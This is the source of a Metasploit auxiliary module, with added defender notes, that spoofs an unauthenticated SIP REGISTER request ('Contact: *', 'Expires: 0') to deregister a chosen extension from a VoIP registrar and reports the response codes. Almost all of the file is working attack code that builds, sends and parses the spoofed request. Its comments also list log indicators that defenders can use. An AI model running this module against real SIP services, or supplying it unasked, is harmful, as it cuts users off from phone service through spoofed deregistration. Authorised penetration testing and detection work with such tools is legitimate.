Path: blob/master/modules/auxiliary/voip/sip_deregister.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner module that sends one unauthenticated SIP REGISTER
# carrying `Contact: *` and `Expires: 0` for a given extension@domain, then
# reports the status code of whatever answers.
#
# Notes for defenders, taken from the code and metadata below:
# * The description states it was only tested against registrars that do not
#   require REGISTER authentication; a 401 or 403 answer is reported as a
#   failed attempt by parse_reply.
# * The module declares IOC_IN_LOGS. The request has fixed traits: CSeq 1,
#   Max-Forwards 70, identical To and From values, and a Call-ID made of a
#   number in 100..199 followed directly by the target IP.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Scanner

  # Declares module metadata and the datastore options read by run_host.
  def initialize
    super(
      'Name' => 'SIP Deregister Extension',
      'Description' => %q{
        This module will attempt to deregister a SIP user from the provider. It
        has been tested successfully when the sip provider/server doesn't use REGISTER
        authentication.
      },
      'Author' => ['ChrisJohnRiley'],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [SERVICE_RESOURCE_LOSS],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    )

    deregister_udp_options

    basic_options = [
      Opt::RPORT(5060),
      OptString.new('SRCADDR', [true, 'The sip address the spoofed deregister request is coming from', '192.168.1.1']),
      OptString.new('EXTENSION', [true, 'The specific extension or name to target', '100']),
      OptString.new('DOMAIN', [true, 'Use a specific SIP domain', 'example.com'])
    ]
    register_options(basic_options)

    advanced_options = [
      OptAddress.new('SIP_PROXY_NAME', [false, 'Use a specific SIP proxy', nil]),
      OptPort.new('SIP_PROXY_PORT', [false, 'SIP Proxy port to use', 5060])
    ]
    register_advanced_options(advanced_options)
  end

  # Rejects EXTENSION and DOMAIN values that contain whitespace.
  #
  # \s also matches CR and LF, so this keeps line breaks out of the two values
  # that are interpolated into the request headers. SRCADDR is not checked here.
  #
  # Raises ArgumentError naming the offending option.
  def setup
    raise ArgumentError, 'EXTENSION cannot contain spaces' if datastore['EXTENSION'].match?(/\s/)
    raise ArgumentError, 'DOMAIN cannot contain spaces' if datastore['DOMAIN'].match?(/\s/)
  end

  # Builds the REGISTER request for one target, sends it over UDP and hands
  # every datagram received within the 3-second read timeout to parse_reply.
  #
  # ip - target address supplied by the scanner mixin; only used in the Call-ID.
  def run_host(ip)
    src = datastore['SRCADDR']
    ext = datastore['EXTENSION']
    dom = datastore['DOMAIN']
    sphost = datastore['SIP_PROXY_NAME']
    spport = datastore['SIP_PROXY_PORT'] || 5060
    conn_string = "#{ext}@#{dom}"

    # A Route header is only added when a proxy name is configured.
    route = "Route: <sip:#{sphost}:#{spport};lr>" unless sphost.nil? || sphost.empty?

    connect_udp

    print_status("Sending deregistration packet to: #{conn_string}")
    print_status("Using SIP proxy #{sphost}:#{spport}") if route

    # Header lines in wire order; the nil Route entry is dropped when unset.
    header_lines = [
      "REGISTER sip:#{dom} SIP/2.0",
      route,
      "Via: SIP/2.0/UDP #{src}",
      'Max-Forwards: 70',
      "To: \"#{ext}\"<sip:#{conn_string}>",
      "From: \"#{ext}\"<sip:#{conn_string}>",
      "Call-ID: #{rand(100..199)}#{ip}",
      'CSeq: 1 REGISTER',
      'Contact: *',
      'Expires: 0',
      'Content-Length: 0'
    ].compact
    req = header_lines.join("\r\n") + "\r\n\r\n"

    udp_sock.put(req)
    response = false

    # Keep reading until a read returns nothing or has no sender address.
    reply = udp_sock.recvfrom(65535, 3)
    while reply && reply[1]
      response = parse_reply(reply)
      reply = udp_sock.recvfrom(65535, 3)
    end

    # No answer may simply mean the reply was sent to the SRCADDR value
    # rather than to this host.
    print_error('No response received from remote host') unless response
  rescue Errno::EACCES => e
    vprint_error(e.message)
  ensure
    disconnect_udp
  end

  # Prints the outcome indicated by one received datagram.
  #
  # pkt - array as returned by recvfrom: pkt[0] is the message text and pkt[1]
  #       is treated as the sender address (an IPv4-mapped "::ffff:" prefix is
  #       stripped in place).
  #
  # Always returns true, so any datagram counts as "a response was received",
  # including one whose status code is not recognised.
  def parse_reply(pkt)
    pkt[1] = pkt[1].sub(/^::ffff:/, '') if pkt[1] =~ /^::ffff:/

    # Second whitespace-separated token of the message; to_i yields 0 when it
    # is missing or not numeric.
    status = pkt[0].split(/\s+/)[1].to_i

    # Name from the To header with any ";parameter" suffix cut off; stays nil
    # when the message has no To header.
    to_value = pkt[0][/^To:\s*(.*)$/i, 1]
    testn = to_value.strip.split(';')[0] if to_value

    case status
    when 200
      print_good("#{testn} de-registered [200 OK]")
    when 401
      print_error("Unable to de-register #{testn} [401 Unauthorised]")
    when 403
      print_error("Unable to de-register #{testn} [403 Forbidden]")
    else
      print_error("#{testn} : Undefined error code #{status}")
    end

    true
  end
end